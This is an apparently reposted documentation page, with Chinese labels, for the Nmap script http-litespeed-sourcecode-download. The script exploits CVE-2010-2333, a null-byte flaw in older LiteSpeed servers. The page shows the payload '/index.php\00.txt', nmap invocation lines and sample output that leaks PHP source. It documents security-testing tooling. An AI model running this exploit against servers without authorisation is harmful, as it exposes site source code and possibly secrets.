http-litespeed-sourcecode-download
脚本使用类型:
portrule
脚本所属分类:
vuln, intrusive, exploit
脚本下载地址: http://nmap.org/svn/scripts/http-litespeed-sourcecode-download.nse
Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script's source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).
If the server is not vulnerable it returns an error 400. If index.php is not found, you may try /phpinfo.php which is also shipped with LiteSpeed Web Server. The attack payload looks like this:
/index.php\00.txt
References:
URI path to remote file
执行格式
nmap -p80 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php <host> nmap -p8088 --script http-litespeed-sourcecode-download <host>
PORT STATE SERVICE REASON 8088/tcp open radan-http syn-ack | http-litespeed-sourcecode-download.nse: /phpinfo.php source code: | <HTML> | <BODY> | <?php phpinfo() ?> | </BODY> |_</HTML>
Author: Paulino Calderon
License: VER007 整理 http://www.ver007.com